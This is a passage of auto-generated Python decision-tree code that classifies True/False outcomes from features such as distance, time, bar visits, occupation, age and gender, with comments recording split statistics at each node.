# {"feature": "Distance", "instances": 925, "metric_value": 0.4846, "depth": 4}
if obj[12]<=1:
# {"feature": "Time", "instances": 498, "metric_value": 0.486, "depth": 5}
if obj[1]>0:
# {"feature": "Bar", "instances": 313, "metric_value": 0.473, "depth": 6}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 169, "metric_value": 0.4379, "depth": 7}
if obj[11]>0:
# {"feature": "Occupation", "instances": 94, "metric_value": 0.4613, "depth": 8}
if obj[7]>3:
# {"feature": "Age", "instances": 63, "metric_value": 0.4959, "depth": 9}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 55, "metric_value": 0.4902, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 54, "metric_value": 0.4967, "depth": 11}
if obj[6]<=3:
# {"feature": "Gender", "instances": 51, "metric_value": 0.4983, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 32, "metric_value": 0.498, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 19, "metric_value": 0.4962, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3571, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.381, "depth": 11}
if obj[3]<=0:
# {"feature": "Education", "instances": 6, "metric_value": 0.4, "depth": 12}
if obj[6]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]<=3:
# {"feature": "Gender", "instances": 31, "metric_value": 0.3632, "depth": 9}
if obj[3]>0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4044, "depth": 10}
if obj[6]<=1:
# {"feature": "Age", "instances": 17, "metric_value": 0.3557, "depth": 11}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.3214, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.375, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[4]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Age", "instances": 10, "metric_value": 0.4, "depth": 11}
if obj[4]>1:
# {"feature": "Children", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Education", "instances": 75, "metric_value": 0.3407, "depth": 8}
if obj[6]>0:
# {"feature": "Age", "instances": 40, "metric_value": 0.2034, "depth": 9}
if obj[4]<=4:
# {"feature": "Restaurant20to50", "instances": 34, "metric_value": 0.1576, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.186, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1071, "depth": 12}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[7]<=2:
return 'True'
elif obj[7]>2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.2333, "depth": 12}
if obj[5]<=0:
# {"feature": "Occupation", "instances": 10, "metric_value": 0.1333, "depth": 13}
if obj[7]<=6:
return 'True'
elif obj[7]>6:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Occupation", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[7]<=6:
return 'False'
elif obj[7]>6:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.0, "depth": 10}
if obj[10]>1.0:
return 'True'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Occupation", "instances": 35, "metric_value": 0.4573, "depth": 9}
if obj[7]>4:
# {"feature": "Age", "instances": 22, "metric_value": 0.3743, "depth": 10}
if obj[4]>1:
# {"feature": "Gender", "instances": 17, "metric_value": 0.4471, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.4815, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.4921, "depth": 13}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.0, "depth": 13}
if obj[10]<=0.0:
return 'True'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[7]<=4:
# {"feature": "Age", "instances": 13, "metric_value": 0.4196, "depth": 10}
if obj[4]>0:
# {"feature": "Restaurant20to50", "instances": 11, "metric_value": 0.4364, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Occupation", "instances": 144, "metric_value": 0.4721, "depth": 7}
if obj[7]<=20:
# {"feature": "Age", "instances": 136, "metric_value": 0.4906, "depth": 8}
if obj[4]>1:
# {"feature": "Education", "instances": 78, "metric_value": 0.4521, "depth": 9}
if obj[6]>1:
# {"feature": "Children", "instances": 58, "metric_value": 0.4733, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 41, "metric_value": 0.4758, "depth": 11}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 26, "metric_value": 0.4567, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.4286, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4778, "depth": 12}
if obj[11]>0:
# {"feature": "Gender", "instances": 12, "metric_value": 0.4857, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[11]<=0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.3644, "depth": 11}
if obj[11]<=0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.4444, "depth": 12}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.3333, "depth": 13}
if obj[10]>1.0:
return 'False'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[10]>1.0:
return 'True'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.2, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=1:
# {"feature": "Children", "instances": 20, "metric_value": 0.3048, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 14, "metric_value": 0.2143, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.3333, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4167, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.0, "depth": 12}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 12}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4713, "depth": 9}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 30, "metric_value": 0.4138, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Children", "instances": 29, "metric_value": 0.423, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 24, "metric_value": 0.4296, "depth": 12}
if obj[3]<=0:
# {"feature": "Education", "instances": 15, "metric_value": 0.4571, "depth": 13}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3175, "depth": 13}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2, "depth": 12}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4269, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 19, "metric_value": 0.4145, "depth": 11}
if obj[10]>0.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.4909, "depth": 12}
if obj[6]>0:
# {"feature": "Children", "instances": 11, "metric_value": 0.4949, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[6]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 9, "metric_value": 0.3016, "depth": 11}
if obj[6]<=2:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.1429, "depth": 12}
if obj[10]>-1.0:
return 'True'
elif obj[10]<=-1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>20:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 185, "metric_value": 0.4726, "depth": 6}
if obj[7]<=7.951351351351351:
# {"feature": "Education", "instances": 114, "metric_value": 0.4532, "depth": 7}
if obj[6]<=3:
# {"feature": "Bar", "instances": 103, "metric_value": 0.4401, "depth": 8}
if obj[8]>-1.0:
# {"feature": "Age", "instances": 102, "metric_value": 0.44, "depth": 9}
if obj[4]>1:
# {"feature": "Restaurant20to50", "instances": 64, "metric_value": 0.4018, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Direction_same", "instances": 63, "metric_value": 0.4061, "depth": 11}
if obj[11]<=0:
# {"feature": "Gender", "instances": 35, "metric_value": 0.4303, "depth": 12}
if obj[3]<=0:
# {"feature": "Children", "instances": 18, "metric_value": 0.4375, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4118, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 28, "metric_value": 0.3684, "depth": 12}
if obj[5]<=0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.3323, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Restaurant20to50", "instances": 38, "metric_value": 0.4694, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Children", "instances": 37, "metric_value": 0.4787, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4607, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4848, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.419, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4718, "depth": 12}
if obj[11]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.45, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[10]<=-1.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]<=-1.0:
return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Age", "instances": 11, "metric_value": 0.3409, "depth": 8}
if obj[4]<=4:
# {"feature": "Bar", "instances": 8, "metric_value": 0.3, "depth": 9}
if obj[8]>0.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.4, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[4]>4:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>7.951351351351351:
# {"feature": "Direction_same", "instances": 71, "metric_value": 0.4524, "depth": 7}
if obj[11]<=0:
# {"feature": "Age", "instances": 39, "metric_value": 0.4438, "depth": 8}
if obj[4]<=2:
# {"feature": "Education", "instances": 25, "metric_value": 0.4047, "depth": 9}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.3412, "depth": 10}
if obj[10]>-1.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.3077, "depth": 11}
if obj[8]<=1.0:
# {"feature": "Gender", "instances": 13, "metric_value": 0.337, "depth": 12}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4167, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[8]>1.0:
return 'False'
else: return 'False'
elif obj[10]<=-1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.4667, "depth": 10}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[4]>2:
# {"feature": "Children", "instances": 14, "metric_value": 0.3357, "depth": 9}
if obj[5]<=0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.2857, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2381, "depth": 11}
if obj[10]>0.0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[6]<=2:
return 'True'
else: return 'True'
elif obj[8]>0.0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[6]>2:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>0:
# {"feature": "Bar", "instances": 32, "metric_value": 0.3822, "depth": 8}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 26, "metric_value": 0.3067, "depth": 9}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.1765, "depth": 10}
if obj[10]>0.0:
return 'True'
elif obj[10]<=0.0:
# {"feature": "Age", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[4]>1:
# {"feature": "Education", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[6]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[3]<=1:
return 'False'
else: return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[4]<=1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.3175, "depth": 10}
if obj[3]<=0:
# {"feature": "Age", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[4]<=6:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.4, "depth": 12}
if obj[10]>-1.0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[6]>1:
return 'True'
elif obj[6]<=1:
return 'True'
else: return 'True'
elif obj[10]<=-1.0:
return 'True'
else: return 'True'
elif obj[4]>6:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 6, "metric_value": 0.25, "depth": 9}
if obj[5]<=0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[3]>0:
# {"feature": "Age", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[4]<=7:
# {"feature": "Education", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[12]>1:
# {"feature": "Bar", "instances": 427, "metric_value": 0.466, "depth": 5}
if obj[8]<=1.0:
# {"feature": "Age", "instances": 341, "metric_value": 0.4752, "depth": 6}
if obj[4]<=5:
# {"feature": "Occupation", "instances": 267, "metric_value": 0.4828, "depth": 7}
if obj[7]<=7.898876404494382:
# {"feature": "Education", "instances": 166, "metric_value": 0.4879, "depth": 8}
if obj[6]<=3:
# {"feature": "Restaurant20to50", "instances": 146, "metric_value": 0.4806, "depth": 9}
if obj[10]>0.0:
# {"feature": "Children", "instances": 95, "metric_value": 0.4841, "depth": 10}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 72, "metric_value": 0.463, "depth": 11}
if obj[11]<=0:
# {"feature": "Time", "instances": 60, "metric_value": 0.4917, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 49, "metric_value": 0.4975, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4481, "depth": 13}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Time", "instances": 12, "metric_value": 0.2333, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.1667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 13}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 23, "metric_value": 0.3683, "depth": 11}
if obj[11]<=0:
# {"feature": "Time", "instances": 17, "metric_value": 0.4706, "depth": 12}
if obj[1]>0:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4667, "depth": 13}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 51, "metric_value": 0.4321, "depth": 10}
if obj[3]<=0:
# {"feature": "Time", "instances": 27, "metric_value": 0.4392, "depth": 11}
if obj[1]<=1:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4059, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3714, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]>1:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Time", "instances": 24, "metric_value": 0.3571, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 21, "metric_value": 0.381, "depth": 12}
if obj[11]<=0:
# {"feature": "Children", "instances": 18, "metric_value": 0.4329, "depth": 13}
if obj[5]>0:
return 'False'
elif obj[5]<=0:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>3:
# {"feature": "Time", "instances": 20, "metric_value": 0.3059, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.3412, "depth": 10}
if obj[11]<=0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.2963, "depth": 11}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1852, "depth": 12}
if obj[10]<=0.0:
# {"feature": "Children", "instances": 6, "metric_value": 0.2778, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>0.0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 13}
if obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>7.898876404494382:
# {"feature": "Direction_same", "instances": 101, "metric_value": 0.443, "depth": 8}
if obj[11]<=0:
# {"feature": "Children", "instances": 73, "metric_value": 0.4052, "depth": 9}
if obj[5]<=0:
# {"feature": "Time", "instances": 39, "metric_value": 0.4409, "depth": 10}
if obj[1]<=2:
# {"feature": "Gender", "instances": 25, "metric_value": 0.3806, "depth": 11}
if obj[3]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4235, "depth": 12}
if obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.4571, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'True'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.1667, "depth": 12}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[6]>0:
return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Education", "instances": 14, "metric_value": 0.3, "depth": 11}
if obj[6]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.3048, "depth": 12}
if obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2143, "depth": 13}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 13}
if obj[10]<=1.0:
return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
